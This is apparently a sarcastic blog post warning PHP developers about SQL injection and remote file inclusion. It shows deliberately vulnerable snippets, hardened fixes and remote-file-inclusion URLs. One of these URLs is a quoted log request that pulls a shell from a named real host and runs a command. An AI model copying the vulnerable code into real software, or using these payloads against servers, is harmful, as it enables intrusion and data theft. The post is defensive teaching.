Get defacements, database dumps, remote shells, ownages and much more!

It works like this: you write dynamic code and allow parameters to be sent to your code. Then, without any kind of filtering or validation, you use those raw values as parameters for your code.

I'll give you two examples so that you can get the result almost instantly:

Example 1: open up your database

The script would be called as news.php?id=1, which would mean "give me the news item whose id equals 1".

Then in news.php you have something like

$result = mysql_query("SELECT * FROM news WHERE id=".$_GET['id']); // raw URL parameter concatenated straight into the SQL

This will make it easy even for level 1 script kiddies to practise their exploiting skills. Nothing too serious, you know, they may just freely read and modify your data. Child's play!

To make sure they get the maximum benefit from their stay on your server, don't forget to store passwords unencrypted, so that when they copy the users table they can try to log into all the users' accounts, since most people use the same password for every online service.

Example 2: open up your file system (and everything else)

You've been told about the advantages of using include files. Not only are you using include() for the header and footer, but you load each section using something like index.php?section=name_of_the_section

Then in index.php you have this:

include($_GET['section']);

Usually it would be used with values of $_GET['section'] such as 'clients.htm', 'about_us.htm', 'our_company.htm'... You name it! But what would you say if a script kiddie got creative and, instead of just entering a simple filename on your server, decided to put an http:// in front of it?

For example: index.php?section=http://astrangeserver/somewhere/including/usually/an/image.jpg

PHP will kindly load whatever is at that URL and evaluate its contents as PHP code.

What, evaluate an image? You'll be surprised.

Try to open that image in your browser. Oh, image.jpg "can't be displayed by the browser because it contains errors". Really? Of course, because it's not meant to be displayed, but to be executed. In fact it is a PHP file which contains code for turning your innocent index.php into a complete control panel from which a cracker can install more stuff on your server, or even try to deface other websites.

So PHP loads it, evaluates it, and suddenly there's a bunch of code ready to be executed at the cracker's will.
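For contrast, here is how the two scripts above look once their URL parameters are validated: an integer check plus a prepared statement for news.php, and an allowlist for the section include. This is an added example written for this post, not code from the original; it uses PDO because the mysql_* functions were removed in PHP 7, and the $pdo connection and sections/ directory are assumed.

```php
<?php
// Added example: hardened versions of news.php and index.php from the post.
// Assumes an existing PDO connection in $pdo and a sections/ directory (hypothetical).

// --- Example 1, hardened: validate the type, then bind the value ---
function fetch_news(PDO $pdo, array $get): ?array {
    // FILTER_VALIDATE_INT returns false for anything that is not an integer,
    // so a string like "1 OR 1=1" never gets anywhere near the query.
    $id = filter_var($get['id'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return null;
    }
    // A prepared statement keeps the value separate from the SQL text,
    // so the parameter can never change the structure of the query.
    $stmt = $pdo->prepare('SELECT * FROM news WHERE id = :id');
    $stmt->execute([':id' => $id]);
    return $stmt->fetch(PDO::FETCH_ASSOC) ?: null;
}

// --- Example 2, hardened: an allowlist instead of include($_GET['section']) ---
const SECTIONS = [
    'clients'     => 'clients.htm',
    'about_us'    => 'about_us.htm',
    'our_company' => 'our_company.htm',
];

function section_file(string $section): ?string {
    // Only names that are keys in the allowlist map to a file. A URL,
    // a "../" path or anything else is simply not a key and is rejected,
    // so the value from the query string is never used as a path itself.
    if (!array_key_exists($section, SECTIONS)) {
        return null;
    }
    return __DIR__ . '/sections/' . SECTIONS[$section];
}

// Usage in index.php (constructed for this example):
$file = section_file($_GET['section'] ?? '');
if ($file === null) {
    http_response_code(404);
    exit('Unknown section');
}
include $file;
```

Independently of the code, keep allow_url_include off in php.ini (it is off by default) so that include() cannot fetch remote URLs at all.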

Isn't it brilliant, amazing, great?

... obviously not!

It's like eating food from dodgy take-aways without thinking twice. You never know what you're eating!

Personally, I'm bored to death of finding in the server logs requests such as index.php?id=http://www.antiqbook.co.uk/map/.xpl/lila.jpg?&cmd=cat%20bugado

And it just shows there are still people tacitly allowing undesirable behaviour to happen on their servers, without giving a damn about it, or even worse, without knowing about it. I wonder if the antiqbook administrators know about this directory with plenty of exploits, remote shells and what not on their server. Or maybe they are just a fake company.

So do us a favour: filter and validate your URL parameters and stop contributing to illegal activities such as spam. Thank you very much.